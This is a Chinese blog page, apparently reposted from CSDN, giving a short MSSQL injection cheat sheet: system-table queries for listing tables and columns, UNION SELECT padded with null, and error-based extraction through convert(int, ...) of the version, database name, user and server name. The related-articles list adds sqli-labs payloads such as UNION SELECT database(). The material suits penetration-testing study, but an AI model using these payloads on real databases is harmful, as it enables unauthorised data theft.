首页 > 数据库 >Mssql数据注入

Mssql数据注入

时间:2024-06-11 15:28:47浏览次数:21  
标签:convert name int where id 数据 Mssql select 注入

1.查询用户创建的数据表

select id,name from sysobjects where xtype='u' ; 

2.查询用户创建数据表的具体列名

select * from syscolumns where  id= 上一步获取的id值;

3.查询具体内容

select id,字段名 from 数据表名;

4.数据库名

db_name()

5.用户登录名

suser_name()

6.使用联合查询,不能直接union select 1,2,3..,而是需要用nuIl填充字段

例如:
union select 1,null,column name from information schema.columns where table name='admin'

7.根据报错获取信息

convert(int,@@version):获取版本信息

convert(int, db_name())数据库名字

convert(int,user)当前用户名

convert(int,@@SERVERNAME) 服务器主机的信息

例如:

# 获取数据表 top 1 =limit 0,1

convert(int,(select top 1 table_name from information_schema.tables where table_schema=db_name()))

标签:convert,name,int,where,id,数据,Mssql,select,注入
From: https://blog.csdn.net/weixin_42515203/article/details/139597042

相关文章

  • 以sqlilabs靶场为例,讲解SQL注入攻击原理【54-65关】
    【Less-54】与前面的题目不同是,这里只能提交10次,一旦提交超过十次,数据会重新刷新,所有的步骤需要重来一次。解题步骤:根据测试,使用的是单引号闭合。#判断字段的数量?id=1'orderby3--aaa#获取数据库的名字?id=-1'unionselect1,2,database()--aa#获取数据......
  • 巧妙使用mapstruct来解决数据库entiy到实体dto的映射关系
    1.引入mapstruct<dependency><groupId>org.mapstruct</groupId><artifactId>mapstruct</artifactId></dependency><dependency><groupId>org.mapstruct</groupId><artifactId>mapstruct-p......
  • DBAPI 数据接口发布平台功能介绍
    书接上文:一、登录  admin/admin 二、功能介绍1.数据源 这里用mysql数据源展示效果 2.API(4.0.10版本这里有个BUG,就是默认不显示API,点搜索才能出来,希望官网后续可以改进~)API这里给个三个配置模块,基本信息和执行器是必须要填写的。这里的访问权限有私有API和开放......
  • DBAPI 安装部署standalone 数据API接口发布平台
    DBAPI项目地址:https://gitee.com/freakchicken/db-api项目简介:零代码开发api服务,只需编写sql,就可以生成httpapi服务。支持api动态创建,兼容多种数据库。适用于BI报表、数据可视化大屏的后端接口快速开发。旨在为企业数据服务的发布提供完整解决方案一、下载安装包 在浏览......
  • 20个国家科学数据中心(下)
    15、国家海洋科学数据中心  平台网址:https://mds.nmdis.org.cn/  简介:国家海洋科学数据中心由国家海洋信息中心牵头,采用“主中心+分中心+数据节点”模式,联合相关涉海单位、科研院所和高校等十余家单位共同建设。以“建立机制-整合资源-研发系统-运维推广-攻关技术”......
  • r语言数据分析案例26-美元兑换欧元汇率分析与研究
    一、研究背景:汇率是国际贸易和金融中最重要的价格之一,它直接影响着各国的经济利益和国际竞争力。美元兑换欧元汇率是全球最重要的汇率之一,它的波动对全球经济和金融市场都有着深远的影响。因此,对美元兑换欧元汇率的分析和研究具有重要的理论和现实意义。二、应用:国际贸易和......
  • r语言数据分析案例25-基于向量自回归模型的标准普尔 500 指数长期预测与机制分析
    一、背景介绍2007年的全球经济危机深刻改变了世界经济格局,引发了一系列连锁反应,波及各大洲。经济增长停滞不前,甚至在某些情况下出现负增长,给出口导向型发展中国家带来了不确定性。实体经济受到的冲击尤为严重,生产成本上升,利润下降,实际经济价值缩水。相比之下,金融部门的投资活......
  • 数据库-Duckdb-catalog和schema
    创建数据库1.会有一个或者两个文件.duckbd.wal 2.用户的数据库名称--databasename-database_oid数据库对象表的全限定名可表示为:Catalog名.Schema名.表名01.DuckDB'stwointernaldatabaseschemanames,systemandtemp.有两个内部的数据schema_nameT......
  • 适用于 macOS 的最佳免费数据恢复软件
    升级到macOS后,它可以帮助您从HDD、SSD、存储卡、USB闪存驱动器、数码相机或其他存储介质设备中完全恢复已删除、格式化或无法访问的数据。当macOSMonterey用户寻找数据恢复解决方案时,免费数据恢复软件始终是一个不错的选择。实际上,当您发现自己误删了重要文件时,第一件......
  • 安全防护与隐私保护:淘宝在线扭蛋机用户数据安全的深度解析
    淘宝在线扭蛋机作为一种集购物与娱乐于一体的新型平台,用户数据的安全性至关重要。本文将深入探讨如何采取有效措施,确保在线扭蛋机用户数据的安全性,防止数据泄露和滥用。一、构建多层次安全防护体系为了应对复杂的网络安全威胁,我们将构建多层次的安全防护体系。这包括网络层......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99